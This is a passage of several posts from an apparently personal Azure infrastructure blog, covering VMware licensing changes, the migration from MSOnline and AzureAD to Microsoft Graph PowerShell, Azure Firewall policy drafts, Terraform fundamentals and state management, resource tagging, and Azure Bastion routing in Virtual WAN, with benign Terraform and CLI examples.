estimation. 5. **Repeat. Improve. Scale.**: Turn infra into productized building blocks that anyone can safely consume. --- ## Let’s Make This Practical So, where are you running Terraform today? Are you still going local, or have you made the leap to pipelines? What’s worked well for your team? What’s slowed you down? Drop your experience in the comments. Would love to hear how others are approaching it, especially in Azure-heavy environments. Want a follow-up piece on how to structure Terraform repos and pipelines in Azure DevOps? Let me know—happy to break that down next. --- # VMware's Latest Licensing Change – An April Surprise, But It's No Joke - URL: https://blog.l-w.tech/blog/2025-04-01-AZ-VMware-Latest-Licensing-Change - Date: 2025-04-01 - Author: Elliott Leighton-Woodruff - Tags: VMware, Azure, Cloud Migration, Virtualisation, Broadcom, Azure VMware Solution, Infrastructure Modernization, Hybrid Cloud Navigate Broadcom's VMware licensing changes with Azure VMware Solution migration strategies. ## With every cloud, there’s a silver lining and maybe a migration opportunity. Broadcom’s acquisition of VMware has been nothing short of a rollercoaster for customers, and just when you thought the ride was over, here comes another twist. As of April 10th, VMware's licensing model is changing again, and this one will hit hard. If you’re still running VMware, you’ll need to license a minimum of 72 cores per agreement, a huge jump from the previous 16-core requirement. If you're already licensing over 72 cores, this won’t affect you, but if you’re below that threshold, brace for impact. Miss a renewal? That’ll be a 20% penalty on your first-year subscription price. If this sounds like an April Fools joke, I wish it were, but it’s very real and businesses need to act fast. ## Bad News for VMware, Worse News for Customers These changes make VMware an increasingly expensive option for virtualisation. Organisations that were previously on the fence about migrating away from VMware now have a crucial decision to make. Is it worth continuing to absorb these rising costs and uncertainty, or is now the perfect time to explore other options? For many businesses, this isn't just a minor inconvenience it’s a major shift in how they approach IT infrastructure. Budget constraints, compliance requirements, and performance expectations all come into play. And with Broadcom's rapid and frequent licensing changes, there's no guarantee that this will be the last disruptive update. VMware was once the gold standard for virtualisation, but now it seems like Broadcom is making it a financial burden rather than an enabler of efficient infrastructure. Customers locked into VMware environments may feel trapped, but in reality, this could be the best time to break free and explore modern alternatives. ## Your Options: Stay, Lift, or Modernise The good news? You have options. Broadcom’s changes may feel like a storm, but with every cloud (pun intended), there’s a silver lining. Companies that take a proactive approach to this situation could reduce costs, improve performance, and future-proof their infrastructure. - **Azure VMware Solution (AVS)** - If you want to stick with VMware but avoid Broadcom’s licensing headaches, AVS lets you migrate VMware workloads to Azure. You keep your existing VMware stack while taking advantage of Azure’s scalability, security, and global reach. With predictable costs and integration with Azure-native services, this could be a smooth transition for many. - **Azure Virtual Machines (IaaS)** - A full cloud migration may feel daunting, but for many businesses, moving workloads to Azure IaaS can cut costs and improve efficiency. Azure provides flexible VM sizing, automation, and cost optimisation tools that VMware simply can't match. By leveraging Azure Hybrid Benefit and Reserved Instances, organisations can see substantial savings over time. - **Platform Modernization (PaaS & Cloud-Native)** - If you’re ready to go all-in on the cloud, modernising your apps with Azure PaaS services removes the need for traditional VMs altogether. This approach unlocks scalability, resilience, and new opportunities for innovation. Services like Azure Kubernetes Service (AKS), Azure App Service, and serverless computing allow businesses to focus on their applications rather than managing infrastructure. - **Hybrid and Edge Solutions** - Not every workload can move to the cloud overnight, and for some, on-premises or hybrid solutions make more sense. Azure Local HCI allows businesses to run Azure services in their own data centres while keeping workloads optimised and future-ready. This gives organisations flexibility while avoiding the uncertainty of Broadcom's licensing changes. ## Act Now – Or Pay the Price With just days until April 10th, businesses must decide: stay locked into an increasingly costly VMware ecosystem or take this as a chance to rethink their cloud strategy. If you’re considering Azure VMware Solution, IaaS, or full modernisation, now is the time to evaluate your options. If you’re still on the fence, consider this: the longer you wait, the more expensive staying on VMware will become. VMware’s roadmap is no longer in your control Broadcom’s changes mean unpredictable licensing costs and potential disruptions. The sooner you act, the better positioned you’ll be. Waiting too long could mean being forced into last-minute, unplanned migrations that are costly and disruptive. Acting now gives you control over your IT future. Proactive businesses will gain a competitive edge, while those who delay could find themselves paying far more in the long run. Instead of waiting for another licensing bombshell, this is the moment to evaluate, plan, and execute a smarter IT strategy. This might not be the April Fools’ joke you wanted – but it could be the wake-up call your IT strategy needs. 💬 **What’s your take? Are you staying with VMware, or looking at alternatives?** --- # The End of AzureAD and MSOnline PowerShell: Time to Move On - URL: https://blog.l-w.tech/blog/2025-03-26-PS-The-End-of-AzureAD-MSOline - Date: 2025-03-26 - Author: Elliott Leighton-Woodruff - Tags: AzureAD, MSOnline, Microsoft Graph, PowerShell, Identity Management, Automation, Governance, Security Migrate from deprecated AzureAD and MSOnline modules to Microsoft Graph PowerShell now. If you're still scripting against AzureAD or MSOnline, you have just 4 days left. Microsoft has officially confirmed the retirement schedule: - **MSOnline is retiring on 30th March 2025** - **AzureAD follows on 30th June 2025** This isn’t just a date on the calendar. If you’ve been relying on either module, you already know the shift to Microsoft Graph PowerShell isn’t just a syntax change,it’s a complete rework of how identity automation is done. ## Why This Matters These modules have been on borrowed time for a while. They don’t support modern Microsoft Entra capabilities, lack granular permission handling, and don’t align with how identity is managed in Microsoft 365 today. Still, they’re everywhere; used in scripts, automation workflows, and legacy onboarding processes across the enterprise. That ubiquity is exactly what makes this transition urgent. In an environment shaped by least privilege, conditional access, and dynamic identity governance, holding onto outdated tools like these puts your organisation at risk. ## What You Should Do Right Now ✅ **Audit your scripts** Search for anything using `Connect-AzureAD`, `Get-MsolUser`, or similar commands. Flag them for review. ✅ **Learn Microsoft Graph PowerShell** Yes, it’s different. Yes, it’s more verbose. But it’s the future, and the sooner you embrace it, the smoother your migration will be. ✅ **Use the migration guides** This isn’t a drop-in replacement. Take advantage of [Microsoft’s migration guidance](https://learn.microsoft.com/en-us/powershell/microsoftgraph/migration-steps?view=graph-powershell-1.0) to help translate existing scripts to Graph equivalents. ✅ **Modernise authentication flows** Graph operates with app-only and delegated permissions. If you’re still relying on legacy credential-based methods, now’s the time to rethink your approach. ## A Bit of Real Talk This isn’t something you can push to next quarter. It’s a hard stop. If your joiner/leaver automation breaks this weekend, or your admin team loses visibility into MFA status because a script fails on Monday, there’s no one else to blame. The tools exist. The documentation is solid. And yes, you still have time but not much. Start small. Pick one script. Migrate it. Learn what works and what doesn’t. Work through the friction now while you’ve still got room to breathe. By the end of this week, MSOnline will be history. And by the middle of the year, AzureAD will follow. --- # A Smarter Way to Manage Azure Firewall Policy Changes - URL: https://blog.l-w.tech/blog/2025-03-19-AZ-Firewall-Policy-Draft-Deployment - Date: 2025-03-19 - Author: Elliott Leighton-Woodruff - Tags: Azure, Firewall, Policy Management, Draft Deployment, Automation, Governance, Security Batch Azure Firewall policy changes using Draft + Deployment for efficient governance. I prefer to manage infrastructure through Infrastructure as Code (IaC), particularly with Terraform, because it provides consistency, scalability, and automation. However, I understand that not every organisation has the skills, resources, or appetite to adopt IaC. Some teams rely on the Azure Portal and need ways to make governance changes efficiently without introducing unnecessary risk. Draft + Deployment (Preview) is designed for those scenarios. But if you’ve ever tried making changes in the portal, you know how tedious it can be. Managing Azure Firewall Policies at scale has always had a problem: each change needs to be deployed individually. If you're rolling out a policy update across multiple Rule Collections (RCs) or Rule Collection Groups (RCGs), that means multiple deployments, each one requiring a fairly lengthy wait. The new Draft + Deployment feature streamlines this. Instead of deploying every small change immediately, you can batch changes together, review them in a draft, and push them all at once. Less overhead, fewer deployments, and a cleaner way to manage policy updates. ------ ### How It Works – Step by Step #### Step 1: Create a Draft The draft feature is designed for bulk updates and staged deployments. Instead of applying changes one at a time, you create a draft that will hold onto modifications until you’re ready to deploy them. This reduces deployment overhead and prevents partially applied configurations across environments. If you’re making several related changes (updating multiple rules to allow access to a new service), you can consolidate them into one controlled release rather than deploying them in isolation.

Screenshot of new Draft + Deployment section


#### Step 2: Making Changes in Draft The draft acts as a safe workspace where you can adjust policies before they go live. This is useful for workflows that require collaboration or approvals. High-impact changes stay isolated until approved – no accidental enforcement of an incomplete ruleset Easier collaboration – teams can review and finetune changes before rolling them out Better testing – see all updates together, reducing the risk of misconfigurations Any changes you make won’t take effect until you the draft is deployed. This is especially useful in environments with strict governance policies where changes need thorough validation.

Screenshot updating rules into draft without applying


#### Step 3: Deploy All Changes at Once Once everything is reviewed and ready, you can deploy the draft in one go. This replaces the current policy immediately. Eliminating the need for multiple incremental deployments Reduces policy drift by ensuring all updates go live simultaneously Makes compliance processes faster and more predictable Once deployed, the new version fully replaces the old one, ensuring there’s always a single active policy in effect.

Screenshot reviewing all draft changes before deploying

Screenshot of confirmation that all changes will be pushed to firewall

------ ### A Game Changer? Maybe not but having seen this problem out in the wild, I think for those using it this could be a real time saver! **Fewer deployments, more control:** Instead of pushing each update separately, bundle them and deploy when ready. This saves time and reduces operational noise. **Better governance:** In rule rich environments, approvals can be done before rules take effect, improving stability and compliance. **Immediate effect, no confusion:** Once deployed, the changes are applied instantly and replace the existing policy version, no more tracking which policies are active and which need updates. ------ ### Best Practices for Using Draft + Deployment Use drafts for planned, large-scale changes. If you’re making multiple policy updates across different rule collections or collection groups, a draft ensures they all roll out in sync. Get approvals early. Since a draft keeps changes isolated before deployment, involve security and compliance teams early to reduce last minute blockers. Keep an eye on what’s active. Since there’s only one draft at a time, don’t leave unfinished changes sitting for too long. ------ ### Final Thoughts Azure’s Draft + Deployment feature is a much needed improvement for managing firewall policies at scale. It reduces deployment overhead, ensures policies are fully updated before being deployed, and allows for more structured governance workflows. If you’re regularly updating Azure Firewall Policy, this feature could make your life a lot easier. Before you go and because it wouldn't be a LinkedIn post by me without it, there's a CLI version too..... [az network firewall policy draft | Microsoft Learn](https://learn.microsoft.com/en-us/cli/azure/network/firewall/policy/draft?view=azure-cli-latest) ```bash az network firewall policy draft create --policy-name [--auto-learn-private-ranges {Disabled, Enabled}] [--base-policy] [--dns-servers] [--enable-dns-proxy {0, 1, f, false, n, no, t, true, y, yes}] [--explicit-proxy] [--fqdns] [--idps-mode {Alert, Deny, Off}] [--ip-addresses] [--no-wait {0, 1, f, false, n, no, t, true, y, yes}] [--private-ranges] [--sql {0, 1, f, false, n, no, t, true, y, yes}] [--tags] [--threat-intel-mode {Alert, Deny, Off}] ``` I'm not entirely sure who this is meant for because if you're managing infra with CLI already there are far better ways of achieving this like ARM, Bicep, Terraform..... 😃 See you out there! --- # Mastering the Basics: Terraform and Infrastructure as Code in Azure - URL: https://blog.l-w.tech/blog/2025-03-18-TF-Mastering-the-basics - Date: 2025-03-18 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, IaC, DevOps, Automation, Remote State, CI/CD, Security, Scalability Master Terraform fundamentals for scalable, secure Azure infrastructure deployments. # Introduction Managing cloud infrastructure manually is slow, error-prone, and impossible to scale. Infrastructure as Code (IaC) solves these problems by allowing infrastructure to be defined, deployed, and maintained with code. Terraform has become the go-to IaC tool because of its declarative approach, multi-cloud support, and ability to track infrastructure changes over time. \ This article will walk through the fundamentals of Terraform, covering why manual provisioning causes problems, how Terraform improves cloud management, and key best practices to ensure scalable and secure deployments. # The Problem with Manual Cloud Management ## Inconsistencies & Errors Manually deploying Azure resources might seem straightforward at first, but as complexity grows, so do the risks. No two environments are ever truly identical when built manually, leading to configuration drift, security vulnerabilities, and unpredictable behaviour across development, staging, and production. \ For example, one engineer may deploy a virtual network with custom security rules, while another follows a different configuration. Over time, these minor inconsistencies pile up, leading to hard-to-troubleshoot issues, unexpected downtime, and a lack of confidence in the stability of the infrastructure. ## Scaling Challenges Infrastructure needs to scale as fast as the business does—but without automation, growth is slow and painful. Manually provisioning new services or expanding existing ones is time-consuming, prone to human error, and often leads to bottlenecks that delay deployments.\ Terraform eliminates these roadblocks by allowing teams to define reusable templates for cloud resources. Whether you need to spin up a new region, deploy a high-availability cluster, or provision dozens of identical environments, Terraform ensures the process is fast, repeatable, and error-free. ## Compliance & Auditing Issues In highly regulated industries, tracking infrastructure changes is non-negotiable as for most other organisations it's seen as a basic need. When managing resources manually, answering basic compliance questions like: - Who deployed this resource? - When was it last updated? - Was this change authorised? It becomes nearly impossible without a centralised, version-controlled approach.\ Terraform solves this by integrating seamlessly with Git-based workflows, providing full visibility into infrastructure changes. Teams can implement policy enforcement, automated security scanning, and audit trails, ensuring they stay compliant while avoiding costly misconfigurations. # What is Infrastructure as Code (IaC)? IaC ensures infrastructure is repeatable, scalable, and secure. Instead of manually provisioning resources, infrastructure is defined in code, making deployments consistent and predictable. ## Declarative vs. Imperative - **Imperative**: Step-by-step scripting (PowerShell, Bash), where each step must be manually defined. - **Declarative**: Define the desired state (Terraform, ARM/Bicep), and Terraform determines the required steps. Declarative models ensure idempotency, meaning Terraform maintains the desired state regardless of repeated executions. # What is Terraform? Terraform is an open-source IaC tool that manages infrastructure across Azure, AWS, GCP, and on-premises environments. Unlike native tools like ARM templates or Bicep, Terraform provides: - ✅ A single language for multi-cloud management - ✅ State tracking to manage infrastructure changes over time - ✅ A declarative syntax that simplifies deployments Terraform ensures teams can manage infrastructure in a repeatable and scalable way without manually provisioning resources every time. # How Terraform Works Terraform follows a simple but powerful workflow: 1. **Write** – Define infrastructure as code (.tf files). 2. **Plan** – Terraform previews what changes will be made (`terraform plan`). 3. **Apply** – Terraform provisions the infrastructure (`terraform apply`). 4. **Manage** – Terraform keeps track of state and ensures consistency (`terraform state`). ## Deploying an Azure Resource Group with Terraform ```sh provider "azurerm" { features {} } resource "azurerm_resource_group" "example" { name = "my-tf-resource-group" location = "West Europe" } ``` With just a few lines of code, Terraform provisions infrastructure that can be replicated, versioned, and managed efficiently. # Best Practices & Advanced Techniques ### Using Variables & Parameter Files Hardcoding values in Terraform files is a recipe for disaster. It makes configurations rigid, difficult to update, and prone to human error. Instead, use variables to keep infrastructure definitions flexible and reusable. **Defining Variables `variables.tf`** Variables allow you to pass values dynamically, making deployments adaptable to different environments: ```sh variable "location" { type = string default = "West Europe" } ``` **Using .tfvars for Different Environments** Instead of manually updating the Terraform configuration, define environment-specific values in a .tfvars file: ```sh location = "North Europe" ``` Applying the Configuration with a Variable File ```sh terraform apply -var-file="dev.tfvars" ``` This keeps infrastructure code clean, modular, and easy to manage across multiple deployments. ## Remote State Management Terraform relies on a state file (terraform.tfstate) to keep track of resources. Storing this file locally can lead to lost data, inconsistent deployments, and major headaches when working in teams. A remote backend solves this by keeping the state file in a central location, allowing multiple engineers to collaborate without conflicts. **Using a Remote Backend in Azure** ```sh terraform { backend "azurerm" { resource_group_name = "terraform-backend" storage_account_name = "tfstatedata" container_name = "tfstate" key = "terraform.tfstate" } } ``` **Why this matters:**\ ✅ Prevents accidental overwrites when multiple users apply changes.\ ✅ Enables state locking, avoiding deployment conflicts.\ ✅ Ensures teams always work with the latest version of the infrastructure. ## Workspaces for Multi-Environment Management Managing Dev, Test, and Prod environments separately is essential, but maintaining duplicate configurations is inefficient. Terraform workspaces provide a streamlined way to manage multiple environments without unnecessary duplication. **Creating and Switching Workspaces** ```sh terraform workspace new dev terraform workspace new prod terraform workspace select dev terraform apply ``` Workspaces prevent configuration drift by ensuring each environment has isolated state tracking, so teams can deploy changes without affecting production. **Best Practices:**\ ✅ Keep environments separate to avoid accidental changes to production.\ ✅ Ensure backend storage keys are unique per workspace to prevent conflicts.\ ✅ Use workspaces for small-scale environment separation, but consider multiple state files for more complex setups. ## Modularising Infrastructure with Terraform Modules Terraform modules structure infrastructure as reusable components. Instead of duplicating code, use modules for frequently deployed infrastructure. Example Module (`modules/network/main.tf`): ```sh resource "azurerm_virtual_network" "example" { name = var.vnet_name location = var.location resource_group_name = var.resource_group_name address_space = ["10.0.0.0/16"] } ``` Using the Module (`main.tf`): ```sh module "network" { source = "./modules/network" vnet_name = "my-vnet" location = "West Europe" resource_group_name = "my-rg" } ``` Modules improve code reusability, maintainability, and standardisation. ## Securing Secrets **Never** hardcode credentials. Hardcoding credentials in Terraform files is a security disaster waiting to happen. If credentials get committed to Git, you could be exposing sensitive information to the world. Instead, use Azure Key Vault to securely store secrets and retrieve them at runtime. **Fetching a Secret from Azure Key Vault** ```sh data "azurerm_key_vault_secret" "db_password" { name = "db-password" key_vault_id = azurerm_key_vault.example.id } ``` **Best Practices:**\ ✅ Store secrets in Key Vault, not in Terraform files.\ ✅ Use Terraform’s sensitive = true flag to mask values.\ ✅ Regularly rotate credentials to reduce risk exposure. # Common Terraform Pitfalls & How to Avoid Them Terraform is powerful, but mistakes can cause outages, misconfigurations, and security risks. Avoid these common pitfalls: ## Hardcoding Secrets Why it's a problem: Credentials and API keys stored in plain text can be leaked, compromised, or accidentally committed to Git. ✅ Solution: Always store secrets in a secrets manager like Azure Key Vault or Terraform Cloud Vault. Use sensitive = true in variables to prevent exposure in logs. ## Skipping terraform plan Why it's a problem: Applying Terraform changes blindly can delete or modify resources unintentionally, leading to downtime. ✅ Solution: Always run: ```sh terraform plan ``` This allows teams to review exactly what Terraform will change before applying. ## Poor State Management Why it's a problem: Terraform state tracks infrastructure, and losing or corrupting it can result in orphaned resources, conflicting deployments, or infrastructure drift. ✅ Solution: Use remote state storage with state locking to avoid conflicts when multiple engineers are working on the same infrastructure. ## Manual Infrastructure Changes Why it's a problem: Making changes directly in the Azure portal or CLI creates drift between the actual environment and Terraform’s state, leading to inconsistencies. ✅ Solution: Always use Terraform as the single source of truth. If manual changes are made, import them into Terraform state: ```sh terraform import azurerm_resource_group.example /subscriptions/12345/resourceGroups/my-rg ``` This keeps Terraform in sync with real-world infrastructure. ## Not Handling Dependencies Properly Why it's a problem: Resources often depend on each other. If dependencies aren’t managed correctly, deployments may fail due to timing issues. ✅ Solution: Use depends_on in Terraform to specify dependencies: ```sh resource "azurerm_storage_account" "example" { name = "examplestorage" resource_group_name = azurerm_resource_group.example.name location = azurerm_resource_group.example.location account_tier = "Standard" account_replication_type = "LRS" depends_on = [azurerm_resource_group.example] } ``` This ensures Terraform provisions resources in the correct order. Terraform is a powerful tool, but getting the fundamentals right is critical. Avoiding these common mistakes ensures secure, scalable, and reliable deployments, keeping infrastructure under control and easy to manage. # Final Thoughts Terraform enables scalable, secure, and automated infrastructure. Get started by: - Deploying a simple Terraform configuration to familiarise yourself with the tool. - Exploring Terraform modules to enhance code reusability. - Implementing remote state storage for team collaboration. - Using workspaces and variables for multi-environment management. Start automating your infrastructure today! --- # Terraform State Management in Azure: Don't Let Your Backend Bite You - URL: https://blog.l-w.tech/blog/2025-02-26-TF-Backend-Bite-You - Date: 2025-02-26 - Author: Elliott Leighton-Woodruff - Tags: Azure, Terraform, IaC, DevOps, Automation, Remote State, CI/CD, Security, Scalability Manage Terraform state securely in Azure Storage with locking and versioning enabled. 🥇 Your Terraform state file is the source of truth for your infrastructure. Lose it, and you might as well be deploying blindfolded. But how could you manage it properly in Azure? ## ⛈️ Why Terraform State Matters (And Why It Can Ruin Your Day) Terraform needs a state file to track the real-world infrastructure vs what your code says should exist. If that state file disappears, gets corrupted, or is being fought over by multiple deployments, you’re in for a world of pain. Some common state management nightmares: - State locked by another process—your team is stuck waiting. - Local state files—lost when a laptop dies or a repo gets cleaned. - Accidental overwrites—because Terraform doesn’t merge state files. - Exposed secrets—because state files store sensitive data in plaintext. So, how can we prevent these? Enter stage left Azure Storage and Terraform Workspaces. ## 🛅 Storing State in Azure Storage (A No-Brainer) Instead of managing state locally (which is a terrible idea), use Azure Storage as a remote backend: 1. Create a storage account (in a secure resource group). 2. Create a storage container for your Terraform state files. 3. Enable versioning & locking (so nothing gets lost or corrupted). 4. Use RBAC to make sure only the right people can access it. Example Terraform Backend Config (`backend.tf`): ```sh terraform { backend "azurerm" { resource_group_name = "terraform-backend-rg" storage_account_name = "tfstatebackend" container_name = "tfstate" key = "terraform.tfstate" } } ``` This makes sure all Terraform runs use the same state file, eliminating local mishaps and making collaboration seamless. ## ⚒️ Workspaces for Multi-Environment Management Terraform workspaces help you manage multiple environments (Dev, Test, Prod) without needing separate backend configurations. - Single storage backend, multiple logical environments. - Fewer hardcoded paths & duplicate state files. - Easy switching between environments. ### Creating & Using Workspaces ```sh terraform workspace new dev terraform workspace select dev terraform workspace list ``` Each workspace gets a separate state file inside the same backend. Terraform will automatically manage the state for different environments under unique keys, e.g.: - `tfstates/dev.terraform.tfstate` - `tfstate/test.terraform.tfstate` - `tfstate/prod.terraform.tfstate` Using the "key" value we can even nest further with the use of additional folders, for example `key = "vwan/terraform.tfstate"` would result in a path of `tfstatebackend/tfstate/vwan/dev.terraform.tfstate`. ## ⚠️ Avoiding Common Pitfalls - State Locking Issues? Use Azure Blob Storage state locking to prevent race conditions. - Accidentally Destroying Resources? Double-check workspaces before running `terraform apply`. - State File Corruption? Enable Azure Blob versioning to roll back if needed. - Secrets in State Files? Use Terraform Cloud or Vault to encrypt sensitive data, or even use the new 1.10+ Ephemeral values to ensure the secret value is never stored in the state. ## 🙅 Don’t Let Terraform State Ruin Your Deployments By using Azure Storage for your backend and Terraform workspaces for environment management, you avoid: - ✅ Lost or overwritten state files. - ✅ Teams tripping over each other’s changes. - ✅ Accidental infrastructure deletions. --- # Why Aren't You Tagging Azure Resources? - URL: https://blog.l-w.tech/blog/2025-02-19-AZ-Why-Arent-You-Tagging-Resources - Date: 2025-02-19 - Author: Elliott Leighton-Woodruff - Tags: Azure, Tagging, Governance, Cost Management, Automation, Security Master Azure resource tagging for cost management, governance, and automation success. # 🏷️ The Case for Tagging How often has your organisation struggled to articulate cost, manage governance, or group resources in Azure? For some organisations, tagging is the norm, with every resource tagged to provide additional information about what the resource is, who it's for, and why it's needed. For others, they've not even started, relying on documentation and in-team knowledge to identify services and manually group things like costs together. Tagging in Azure isn't just a cosmetic feature. If used correctly, it can be useful not only for IT admins but also for tracking costs and even affecting Azure Policy. Tagging is hugely important for a well-oiled, well-architected platform and, at scale, is sometimes vital to operations. So if tagging is so good, why are so many failing to do it properly? ## ⚡ Real World Benefits Tagging in Azure has power. You might not need it all today, but three months in, you get asked for a report with 15 minutes' notice, and boom, easy next please... Here are some of the ways in which tagging improves cost management, governance & compliance, automation, and security and access control: ### 💰 Cost Management & Visibility Understanding your cloud spend can be tricky. Even with native solutions like cost analysis, most businesses need to understand what each service or department is costing rather than just the monthly payment. Sure, you could split everything into separate subscriptions, but I use subscriptions as a demarcation of responsibility and access rather than a cost centre. I don't want a subscription with just two VMs, a vNet, and a single function app, do you? Tagging resources with tags like `CostCenter`, `Project`, `Service`, and `Owner` allows your FinOps or finance teams to understand costs by department, application, or team, making it easier to allocate budget and prevent overruns. 🙋 **Example**: Tagging all resources with `Service = My Fancy Service` lets you quickly realise all cloud expenses relating to a service rather than individual components in Azure Cost Management. ### 🔍 Governance & Compliance Organisations need clear ownership and accountability over their cloud resources. No one knows this better than those in heavily regulated industries, but don't let regulation be the requirement. Learn from those that put in the hard work with the auditors! A well-defined tagging structure will help you: - **Resource tracking** → Know who owns what and why it exists. - **Lifecycle management** → Apply tags like `ExpirationDate` or `CreatedBy` to prevent orphaned resources. - **Compliance audits** → Easily filter and report on tagged resources to meet security and governance standards. 🙋 **Example**: Enforcing `Environment = Prod/Test/Dev` tags helps prevent accidental deployments of sensitive workloads in non-compliant environments. ### 🔄 Automation & Operations Manually managing your infrastructure was fine when you had five VMs, some storage accounts, and a web app, but now you've got 5,000 people in the business to support and hundreds of resources in Azure with a team of 15, and you're drowning doing it all by hand 🤽 Tags allow teams to automate actions based on conditions, ensuring standardisation and repeatability with hands-off management. - **Power management** → Power off VMs at night using logic/function or policy by targeting resources with `AutoShutdown = True`. - **Apply backup policies** → Automate backup policy assignment for mission-critical workloads with `BackupPolicy = Daily` or `Criticality = Tier1`. 🙋 **Example**: A Logic App workflow can age resources based on an `ExpirationDate` tag, ensuring cost control and clean-up of stale workloads. ### 🔐 Security & Access Control Tags can also play a key role in bolstering security and enforcing policies: - **Enhanced Security** → Highlight services that require enhanced levels of security or even deploy extensions or Azure Policy to workloads with `SecurityLevel = High`. - **Secure resources** → Dynamically apply RBAC to resources based on tags using `DataSensitivity = Confidential` (Think about how you could use Deny RBAC here to be very clever). - **Classify data** → Tag resources with data classification like `DataClassification = PII` to help people understand the importance and sensitivity of what they are working on. 🙋 **Example**: Azure Policy could block public IP addresses for any resource where `SecurityLevel = High`. ## 🚨 Why Do People Skip Tagging? I've sold you on tags already. It's okay, I can tell. It can be our secret. But why do people skip tags? If they are so great, everyone would be using them. The common responses I've heard are: - “We’ll do it later” → Until costs get out of control or resources are hard to find. - “It’s too much effort” → With Azure Policy, tagging can be automated. - “We don’t have a standard” → Then let’s create one! Define required tags for your organisation. Want some quick ideas on creating a standard? Microsoft has provided just the thing. ## 🔧 How to Fix It: A Practical Guide I'm going to keep it really simple. Get the buy-in first, explain the benefits with your tech lead, and get it in. The sooner, the better. 1. **Define a tagging strategy** → What tags should every resource have? (Owner, CostCenter, Environment, etc.) 2. **Get it documented** → Get this detailed somewhere, anywhere, and get it out to everyone. 3. **Enforce tagging with Azure Policy** → Block untagged resources or have them inherit tags from the resource group. This might make you unpopular at first, but they'll get over it. 4. **Use automation** → If you've got a legacy estate, use tools like PowerShell, Terraform, or Bicep to create and apply tags at scale. 5. **Make it easy** → You've got the strategy, the docs, and the automation, so you're already there. Just don't make it a complicated process. If this is hard, no one will do it. ## 💡 Final Thoughts: Are You Doing It Right? Now, hopefully, I've helped explain the importance of tags. I could go on and on, but this is enough for you to pick out what matters to your business and where you can see the value. Tags are only a value add; you just need to find the right way they work for you. Make sure you do this ahead of time. Don't wait until you need to roll something out or get a report done for the next meeting. I'm interested to hear from you all. What’s the worst tagging mess you’ve seen? Do you think mandatory tagging should be enforced? How does your team handle Azure tagging? --- # The Issue with Azure Bastion in Virtual WAN - URL: https://blog.l-w.tech/blog/2025-02-12-AZ-vwan-bastion-issues - Date: 2025-02-12 - Author: Elliott Leighton-Woodruff - Tags: Azure, Bastion, Virtual WAN, Networking, Security Solve Azure Bastion routing issues in Virtual WAN with custom route configurations. ## Intro Most people have used Azure Bastion before. The uptake of the ease-of-use product has been great, and for years it's been simple and effective. However, as more and more people move to Virtual WAN (vWAN), the experience hasn't been so great. For those that haven't used it before, Azure Bastion is a resource that allows users to initiate an RDP-like connection over HTTPS to servers within Azure without the need to open ports, add public IP addresses, or compromise security. It is secured by EntraID in the first case, and a username/password is still required to authenticate to the VM. ![Azure Bastion connection diagram](https://stlwtechwebimages.blob.core.windows.net/images/bastion-diagram.png) Out of the box, deploying Bastion into a virtual network (VNet) within Azure should give you the ability to connect to any virtual machine by simply hitting connect and providing a username/password. ![Bastion direct connect feature](https://stlwtechwebimages.blob.core.windows.net/images/bastion-connect.png) But when deployed into vWAN, this doesn't work, and Bastion can only reach virtual machines within its current VNet. This leaves you at a crossroads: do I deploy one per VNet (incurring duplications of cost), do I scrap Bastion and go for something else, or do I find a solution? ## Why Doesn't Bastion Work in the Typical Way with vWAN? In the 'hub and spoke' model, widely used, Bastion is deployed within a VNet and can provide seamless access to VMs using private IP addresses or directly by resolving the Azure side DNS name for the VM. However, in vWAN, things work differently: - vWAN interconnects VNets through a Virtual WAN Hub (vWAN hub) controlling regional and global routing. - Bastion will only be able to route to virtual machines within its own VNet. This could be a tempting solution, but at £170.25 for Standard in UK South per instance, this could very quickly get expensive! - Inbound client connections reach Bastion directly, while outbound traffic traverses the firewall, causing asymmetric routing and dropping any successful connections. As a result, using Bastion in vWAN will not work across VNets similar to that seen in hub and spoke or mesh networks. ## So How Can We Use Bastion in vWAN? If you've got this far and still feel inclined to stick with Bastion but don't want a resource per VNet, fear not, there is a solution! 1. **Deploy a VNet specifically for Bastion** - As Bastion will be the only service, we want to ignore the default routes provided by the vWAN Hub. It makes sense to prevent that nothing else takes this path. 2. **Ensure that an NSG has been created for the AzureBastionSubnet** - This NSG should allow the connections inbound and outbound. [Working with VMs and NSGs in Azure Bastion](https://learn.microsoft.com/en-us/azure/bastion/bastion-nsg) 3. **Disable default route propagation for the new Bastion VNet** - Ensure that inbound/outbound traffic takes the same route. 4. **Create a firewall rule to allow Bastion to reach other VNets** - Source: 'Bastion VNet', Destination: 'Regional Range', Destination ports: '22, 3389'. ## Limitations & Considerations While this approach allows Bastion to work within vWAN, there are a few things to keep in mind: - **Manual IP Input** - Since private DNS resolution doesn’t work in the same way, users must manually enter IP addresses rather than directly clicking on. - **Regional Availability** - Ensure Bastion is deployed in the same region as the VNets that need access. ## Final Thoughts Whilst Bastion does not work traditionally in a Virtual WAN environment, it can still be used by connecting via private IP addresses instead of relying on private endpoints. To avoid connectivity issues, deploy Bastion in a dedicated VNet and disable default route propagation to prevent asymmetric routing. Are you using Bastion with vWAN? What challenges have you faced, and how have you worked around them? Let’s discuss in the comments! 🚀 > **Note**: This issue is documented on Microsoft's [Bastion FAQ](https://learn.microsoft.com/en-us/azure/bastion/bastion-faq) though the information is fairly limited. ![Screenshot of Bastion with vWAN limitation](https://stlwtechwebimages.blob.core.windows.net/images/bastion-vwan-limitation.png) --- # What's the best IaC tool for Azure? - URL: https://blog.l-w.tech/blog/2025-01-29-Whats-the-best-IaC-tool - Date: 2025-01-29 - Author: Elliott Leighton-Woodruff - Tags: Azure, PowerShell, ARM Templates, Bicep, Terraform, IaC, DevOps, Automation, Cloud Strategy Compare PowerShell, ARM, Bicep, and Terraform to choose the right Azure IaC tool. Many of you will already be using Infrastructure as Code (IaC) day to day but for some choosing the right tool to ensure success is the real first stumbling block. So with so many options, how should you go about choosing the one that's right? In the Microsoft corner there's; PowerShell, Azure Resource Manager (ARM), Bicep and in the 3rd party corner HashiCorp Terraform each offer benefits and drawbacks. The choice comes down to your team's skills, the complexity of your environment, and your cloud strategy. ------ ### PowerShell [What is PowerShell? - PowerShell | Microsoft Learn](https://learn.microsoft.com/en-us/powershell/scripting/overview?view=powershell-7.5) PowerShell is probably the best known of the 4 tools, originally releasing way back in 2006, its been used by everyone and their dog for everything from AD user account creation to documentation automation and SMTP transport. While not strictly an IaC tool, it’s a go-to for many professionals managing cloud and hybrid environments and using Az modules combined with simple list like CSV's can hold its own deploying resources at scale.

Code snippet - PowerShell script to create a VM

